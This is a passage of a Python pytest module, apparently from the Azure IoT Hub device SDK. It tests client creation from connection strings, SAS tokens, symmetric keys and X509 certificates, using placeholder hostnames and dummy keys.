config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.websockets
# TODO: Show that input in the wrong format is formatted to the correct one. This test exists
# in the IoTHubPipelineConfig object already, but we do not currently show that this is felt
# from the API level.
@pytest.mark.it("Sets the 'cipher' user option parameter on the PipelineConfig, if provided")
def test_cipher_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
cipher = "DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:ECDHE-ECDSA-AES128-GCM-SHA256"
client_create_method(*create_method_args, cipher=cipher)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.cipher == cipher
@pytest.mark.it(
"Sets the 'server_verification_cert' user option parameter on the PipelineConfig, if provided"
)
def test_server_verification_cert_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
server_verification_cert = "fake_server_verification_cert"
client_create_method(*create_method_args, server_verification_cert=server_verification_cert)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.server_verification_cert == server_verification_cert
@pytest.mark.it(
"Sets the 'proxy_options' user option parameter on the PipelineConfig, if provided"
)
def test_proxy_options(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
proxy_options = ProxyOptions(proxy_type=socks.HTTP, proxy_addr="127.0.0.1", proxy_port=8888)
client_create_method(*create_method_args, proxy_options=proxy_options)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.proxy_options is proxy_options
@pytest.mark.it(
"Sets the 'keep_alive' user option parameter on the PipelineConfig, if provided"
)
def test_keep_alive_options(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
keepalive_value = 60
client_create_method(*create_method_args, keep_alive=keepalive_value)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.keep_alive == keepalive_value
@pytest.mark.it("Raises a TypeError if an invalid user option parameter is provided")
def test_invalid_option(
self, option_test_required_patching, client_create_method, create_method_args
):
with pytest.raises(TypeError):
client_create_method(*create_method_args, invalid_option="some_value")
@pytest.mark.it("Sets default user options if none are provided")
def test_default_options(
self,
mocker,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client_create_method(*create_method_args)
# Both pipelines use the same IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
# Pipeline Config has default options set that were not user-specified
assert config.product_info == ""
assert config.websockets is False
assert config.cipher == ""
assert config.proxy_options is None
assert config.server_verification_cert is None
assert config.keep_alive == DEFAULT_KEEPALIVE
# TODO: consider splitting this test class up into device/module specific test classes to avoid
# the conditional logic in some tests
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubClientCreateFromConnectionStringTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_connection_string
@pytest.fixture
def create_method_args(self, connection_string):
"""Provides the specific create method args for use in universal tests"""
return [connection_string]
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values in the provided connection string"
)
def test_sastoken(self, mocker, client_class, connection_string):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
custom_ttl = 1000
client_class.create_from_connection_string(connection_string, sastoken_ttl=custom_ttl)
# Determine expected URI based on class under test
if client_class.__name__ == "IoTHubDeviceClient":
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=cs_obj[cs.HOST_NAME], device_id=cs_obj[cs.DEVICE_ID]
)
else:
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
# SymmetricKeySigningMechanism created using the connection string's SharedAccessKey
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# Token was created with a SymmetricKeySigningMechanism, the expected URI, and custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class, connection_string):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
client_class.create_from_connection_string(connection_string)
# Determine expected URI based on class under test
if client_class.__name__ == "IoTHubDeviceClient":
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=cs_obj[cs.HOST_NAME], device_id=cs_obj[cs.DEVICE_ID]
)
else:
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
# SymmetricKeySigningMechanism created using the connection string's SharedAccessKey
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# Token was created with a SymmetricKeySigningMechanism, the expected URI, and default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP Pipelines with an IoTHubPipelineConfig object containing the SasToken and values from the connection string"
)
def test_pipeline_config(
self,
mocker,
client_class,
connection_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(connection_string)
client_class.create_from_connection_string(connection_string)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == cs_obj[cs.DEVICE_ID]
assert config.hostname == cs_obj[cs.HOST_NAME]
assert config.sastoken is sastoken_mock.return_value
if client_class.__name__ == "IoTHubModuleClient":
assert config.module_id == cs_obj[cs.MODULE_ID]
assert config.blob_upload is False
assert config.method_invoke is False
else:
assert config.module_id is None
assert config.blob_upload is True
assert config.method_invoke is False
if cs_obj.get(cs.GATEWAY_HOST_NAME):
assert config.gateway_hostname == cs_obj[cs.GATEWAY_HOST_NAME]
else:
assert config.gateway_hostname is None
@pytest.mark.it(
"Returns an instance of an IoTHub client using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
connection_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_connection_string(connection_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError when given an invalid connection string")
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(
"HostName=value.domain.net;DeviceId=my_device;SharedAccessKey=Invalid",
id="Shared Access Key invalid",
),
pytest.param(
"HostName=value.domain.net;WrongValue=Invalid;SharedAccessKey=Zm9vYmFy",
id="Contains extraneous data",
),
pytest.param("HostName=value.domain.net;DeviceId=my_device", id="Incomplete"),
],
)
def test_raises_value_error_on_bad_connection_string(self, client_class, bad_cs):
with pytest.raises(ValueError):
client_class.create_from_connection_string(bad_cs)
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class, connection_string):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_connection_string(connection_string)
assert e_info.value.__cause__ is token_err
class SharedIoTHubClientPROPERTYHandlerTests(object):
@pytest.mark.it("Can have its value set and retrieved")
def test_read_write(self, client, handler, handler_name):
assert getattr(client, handler_name) is None
setattr(client, handler_name, handler)
assert getattr(client, handler_name) is handler
@pytest.mark.it("Reflects the value of the handler manager property of the same name")
def test_set_on_handler_manager(self, client, handler, handler_name):
assert getattr(client, handler_name) is None
assert getattr(client, handler_name) is getattr(client._handler_manager, handler_name)
setattr(client, handler_name, handler)
assert getattr(client, handler_name) is handler
assert getattr(client, handler_name) is getattr(client._handler_manager, handler_name)
@pytest.mark.it(
"Implicitly enables the corresponding feature if not already enabled, when a handler value is set"
)
def test_enables_feature_only_if_not_already_enabled(
self, mocker, client, handler, handler_name, feature_name, mqtt_pipeline
):
# Feature will appear disabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
# Set handler
setattr(client, handler_name, handler)
# Feature was enabled
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == feature_name
mqtt_pipeline.enable_feature.reset_mock()
# Feature will appear already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True
# Set handler
setattr(client, handler_name, handler)
# Feature was not enabled again
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Implicitly disables the corresponding feature if not already disabled, when handler value is set back to None"
)
def test_disables_feature_only_if_not_already_disabled(
self, mocker, client, handler_name, feature_name, mqtt_pipeline
):
# Feature will appear enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True
# Set handler to None
setattr(client, handler_name, None)
# Feature was disabled
assert mqtt_pipeline.disable_feature.call_count == 1
assert mqtt_pipeline.disable_feature.call_args[0][0] == feature_name
mqtt_pipeline.disable_feature.reset_mock()
# Feature will appear already disabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
# Set handler to None
setattr(client, handler_name, None)
# Feature was not disabled again
assert mqtt_pipeline.disable_feature.call_count == 0
@pytest.mark.it(
"Locks the client to Handler Receive Mode if the receive mode has not yet been set"
)
def test_receive_mode_not_set(self, client, handler, handler_name):
assert client._receive_type is RECEIVE_TYPE_NONE_SET
setattr(client, handler_name, handler)
assert client._receive_type is RECEIVE_TYPE_HANDLER
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to Handler Receive Mode"
)
def test_receive_mode_set_handler(self, client, handler, handler_name):
client._receive_type = RECEIVE_TYPE_HANDLER
setattr(client, handler_name, handler)
assert client._receive_type is RECEIVE_TYPE_HANDLER
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has already been set to API Receive Mode"
)
def test_receive_mode_set_api(self, client, handler, handler_name, mqtt_pipeline):
client._receive_type = RECEIVE_TYPE_API
# Error was raised
with pytest.raises(client_exceptions.ClientError):
setattr(client, handler_name, handler)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# NOTE: If more properties are added, this class should become a general purpose properties testclass
class SharedIoTHubClientPROPERTYConnectedTests(object):
@pytest.mark.it("Cannot be changed")
def test_read_only(self, client):
with pytest.raises(AttributeError):
client.connected = not client.connected
@pytest.mark.it("Reflects the value of the root stage property of the same name")
def test_reflects_pipeline_property(self, client, mqtt_pipeline):
mqtt_pipeline.connected = True
assert client.connected
mqtt_pipeline.connected = False
assert not client.connected
class SharedIoTHubClientOCCURANCEConnectTests(object):
@pytest.mark.it("Ensures that the HandlerManager is running")
def test_ensure_handler_manager_running_on_connect(self, client, mocker):
ensure_running_spy = mocker.spy(client._handler_manager, "ensure_running")
client._on_connected()
assert ensure_running_spy.call_count == 1
class SharedIoTHubClientOCCURANCEDisconnectTests(object):
@pytest.mark.it("Clears all pending MethodRequests upon disconnect")
def test_state_change_handler_clears_method_request_inboxes_on_disconnect(self, client, mocker):
clear_method_request_spy = mocker.spy(client._inbox_manager, "clear_all_method_requests")
client._on_disconnected()
assert clear_method_request_spy.call_count == 1
##############################
# SHARED DEVICE CLIENT TESTS #
##############################
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromSastokenTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_sastoken
@pytest.fixture
def create_method_args(self, sas_token_string):
"""Provides the specific create method args for use in universal tests"""
return [sas_token_string]
@pytest.mark.it(
"Creates a NonRenewableSasToken from the SAS token string provided in parameters"
)
def test_sastoken(self, mocker, client_class, sas_token_string):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
# NonRenewableSasToken created from sastoken string
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(sas_token_string)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the SasToken"
)
def test_pipeline_config(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sas_token_string)
token_uri_pieces = real_sastoken.resource_uri.split("/")
expected_hostname = token_uri_pieces[0]
expected_device_id = token_uri_pieces[2]
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == expected_device_id
assert config.module_id is None
assert config.hostname == expected_hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_sastoken(sastoken=sas_token_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if NonRenewableSasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, sas_token_string, mocker, client_class):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_sastoken(sastoken=sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
@pytest.mark.parametrize(
"invalid_token_uri",
[
pytest.param("some.hostname/devices", id="Too short"),
pytest.param("some.hostname/devices/my_device/somethingElse", id="Too long"),
pytest.param(
"some.hostname/not-devices/device_id", id="Incorrectly formatted device notation"
),
pytest.param("some.hostname/devices/my_device/modules/my_module", id="Module URI"),
],
)
def test_raises_value_error_invalid_uri(self, mocker, client_class, invalid_token_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_token_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, client_class):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote("some.hostname/devices/my_device", safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, sas_token_string):
with pytest.raises(TypeError):
client_class.create_from_sastoken(sastoken=sas_token_string, sastoken_ttl=1000)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromSymmetricKeyTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
symmetric_key = "Zm9vYmFy"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_symmetric_key
@pytest.fixture
def create_method_args(self):
"""Provides the specific create method args for use in universal tests"""
return [self.symmetric_key, self.hostname, self.device_id]
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values provided in parameters"
)
def test_sastoken(self, mocker, client_class):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=self.hostname, device_id=self.device_id
)
custom_ttl = 1000
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key,
hostname=self.hostname,
device_id=self.device_id,
sastoken_ttl=custom_ttl,
)
# SymmetricKeySigningMechanism created using the provided symmetric key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=self.symmetric_key)
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class):
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}".format(
hostname=self.hostname, device_id=self.device_id
)
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
# SymmetricKeySigningMechanism created using the provided symmetric key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=self.symmetric_key)
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class):
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_symmetric_key(
symmetric_key=self.symmetric_key, hostname=self.hostname, device_id=self.device_id
)
assert e_info.value.__cause__ is token_err
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubDeviceClientCreateFromX509CertificateTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_x509_certificate
@pytest.fixture
def create_method_args(self, x509):
"""Provides the specific create method args for use in universal tests"""
return [x509, self.hostname, self.device_id]
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the X509 and other values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] == mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.x509 is x509
assert config.blob_upload is True
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceclient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, x509):
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, sastoken_ttl=1000
)
##############################
# SHARED MODULE CLIENT TESTS #
##############################
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromSastokenTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_sastoken
@pytest.fixture
def create_method_args(self, sas_token_string):
"""Provides the specific create method args for use in universal tests"""
return [sas_token_string]
@pytest.mark.it(
"Creates a NonRenewableSasToken from the SAS token string provided in parameters"
)
def test_sastoken(self, mocker, client_class, sas_token_string):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
# NonRenewableSasToken created from sastoken string
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(sas_token_string)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the SasToken"
)
def test_pipeline_config(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
real_sastoken = st.NonRenewableSasToken(sas_token_string)
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
sastoken_mock.return_value = real_sastoken
client_class.create_from_sastoken(sastoken=sas_token_string)
token_uri_pieces = real_sastoken.resource_uri.split("/")
expected_hostname = token_uri_pieces[0]
expected_device_id = token_uri_pieces[2]
expected_module_id = token_uri_pieces[4]
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == expected_device_id
assert config.module_id == expected_module_id
assert config.hostname == expected_hostname
assert config.gateway_hostname is None
assert config.sastoken is sastoken_mock.return_value
assert config.blob_upload is False
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubModuleClient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
sas_token_string,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client = client_class.create_from_sastoken(sastoken=sas_token_string)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises ValueError if NonRenewableSasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(self, mocker, client_class, sas_token_string):
# NOTE: specific inputs that could cause this are tested in the sastoken test module
sastoken_mock = mocker.patch.object(st, "NonRenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_sastoken(sastoken=sas_token_string)
assert e_info.value.__cause__ is token_err
@pytest.mark.it("Raises ValueError if the provided SAS token string has an invalid URI")
@pytest.mark.parametrize(
"invalid_token_uri",
[
pytest.param("some.hostname/devices/my_device/modules/", id="Too short"),
pytest.param(
"some.hostname/devices/my_device/modules/my_module/somethingElse", id="Too long"
),
pytest.param(
"some.hostname/not-devices/device_id/modules/module_id",
id="Incorrectly formatted device notation",
),
pytest.param(
"some.hostname/devices/device_id/not-modules/module_id",
id="Incorrectly formatted module notation",
),
pytest.param("some.hostname/devices/my_device/", id="Device URI"),
],
)
def test_raises_value_error_invalid_uri(self, mocker, client_class, invalid_token_uri):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(invalid_token_uri, safe=""),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() + 3600),
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises ValueError if the provided SAS token string has already expired")
def test_expired_token(self, mocker, client_class):
sastoken_str = "SharedAccessSignature sr={resource}&sig={signature}&se={expiry}".format(
resource=urllib.parse.quote(
"some.hostname/devices/my_device/modules/my_module", safe=""
),
signature=urllib.parse.quote("ajsc8nLKacIjGsYyB4iYDFCZaRMmmDrUuY5lncYDYPI=", safe=""),
expiry=int(time.time() - 3600), # expired
)
with pytest.raises(ValueError):
client_class.create_from_sastoken(sastoken=sastoken_str)
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, sas_token_string):
with pytest.raises(TypeError):
client_class.create_from_sastoken(sastoken=sas_token_string, sastoken_ttl=1000)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromX509CertificateTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
hostname = "durmstranginstitute.farend"
device_id = "MySnitch"
module_id = "Charms"
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_x509_certificate
@pytest.fixture
def create_method_args(self, x509):
"""Provides the specific create method args for use in universal tests"""
return [x509, self.hostname, self.device_id, self.module_id]
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the X509 and other values provided in parameters"
)
def test_pipeline_config(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client_class.create_from_x509_certificate(
